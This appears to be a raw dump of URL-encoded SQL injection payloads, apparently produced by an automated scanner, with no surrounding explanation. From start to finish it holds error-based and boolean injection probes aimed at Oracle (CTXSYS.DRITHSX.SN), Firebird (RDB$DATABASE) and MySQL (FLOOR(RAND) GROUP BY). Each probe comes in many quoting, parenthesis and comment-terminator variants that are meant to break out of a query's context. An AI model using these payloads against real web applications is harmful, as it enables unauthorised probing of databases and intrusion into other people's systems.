foo%22%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%22TBLZ%22%3D%22TBLZ foo%22%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22FHUB%22%20LIKE%20%22FHUB foo%22%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22GkYl%22%20LIKE%20%22GkYl foo%22%29%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22DAYo%22%20LIKE%20%22DAYo foo%22%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%22pwBW%22%20LIKE%20%22pwBW foo%25%27%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27pllL%27%3D%27pllL foo%00%27%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27NBgq%27%3D%27NBgq foo%27%29%20WHERE%205777%3D5777%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 foo%22%29%20WHERE%206143%3D6143%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 foo%29%20WHERE%203636%3D3636%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 foo%27%20WHERE%201563%3D1563%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 foo%22%20WHERE%209839%3D9839%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 foo%20WHERE%203966%3D3966%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27iPBL%27%20FROM%20DUAL%20WHERE%201769%3D1769%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27FXUu%27%20WHERE%206171%3D6171%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20wpXc%20WHERE%201323%3D1323%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27jair%27%20WHERE%201659%3D1659%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20%23 foo%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 foo%27%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 foo%27%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 foo%22%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 foo%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%289362%3D9362 foo%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%281837%3D1837 foo%29%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%281782%3D1782 foo%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29 foo%27%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27VVXw%27%3D%27VVXw foo%27%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%27vXxN%27%3D%27vXxN foo%27%29%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%27WgtL%27%3D%27WgtL foo%27%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27JkQE%27%3D%27JkQE foo%27%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27LDyc%27%20LIKE%20%27LDyc foo%27%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%27KqaR%27%20LIKE%20%27KqaR foo%27%29%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%27ENFW%27%20LIKE%20%27ENFW foo%27%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27tZTQ%27%20LIKE%20%27tZTQ foo%22%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%22KldE%22%3D%22KldE foo%22%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%22cBQt%22%3D%22cBQt foo%22%29%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%22TgWl%22%3D%22TgWl foo%22%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%22zKmK%22%3D%22zKmK foo%22%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%22lyCC%22%20LIKE%20%22lyCC foo%22%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%22fogY%22%20LIKE%20%22fogY foo%22%29%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%22MfkW%22%20LIKE%20%22MfkW foo%22%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%22TuwY%22%20LIKE%20%22TuwY foo%25%27%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%28%27YeoK%27%3D%27YeoK foo%00%27%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20AND%20%27iMbE%27%3D%27iMbE foo%27%29%20WHERE%202989%3D2989%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 foo%22%29%20WHERE%207031%3D7031%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 foo%29%20WHERE%204538%3D4538%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 foo%27%20WHERE%201559%3D1559%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 foo%22%20WHERE%204149%3D4149%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 foo%20WHERE%206095%3D6095%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20--%20 foo%27%7C%7C%28SELECT%20%27cHFG%27%20FROM%20DUAL%20WHERE%208160%3D8160%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27HTFd%27%20WHERE%202742%3D2742%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20Pcql%20WHERE%206074%3D6074%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20%29%2B%27 foo%27%2B%28SELECT%20%27kheG%27%20WHERE%203110%3D3110%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%207015%3D%28%27%3Axpc%3A%27%7C%7C%28SELECT%20CASE%207015%20WHEN%207015%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aurs%3A%27%29%20%23 -8043%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -2400%27%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1667%27%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -3084%22%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -4411%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%289890%3D9890 -8527%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%282789%3D2789 -7772%29%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%286781%3D6781 -4702%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -4058%27%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27opTJ%27%3D%27opTJ -4616%27%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27euQO%27%3D%27euQO -7904%27%29%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27imtA%27%3D%27imtA -5641%27%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27gMuu%27%3D%27gMuu -2352%27%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27YQni%27%20LIKE%20%27YQni -3051%27%29%29%20OR%20%28SELECT%205468%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27vKIs%27%20LIKE%20%27vKIs 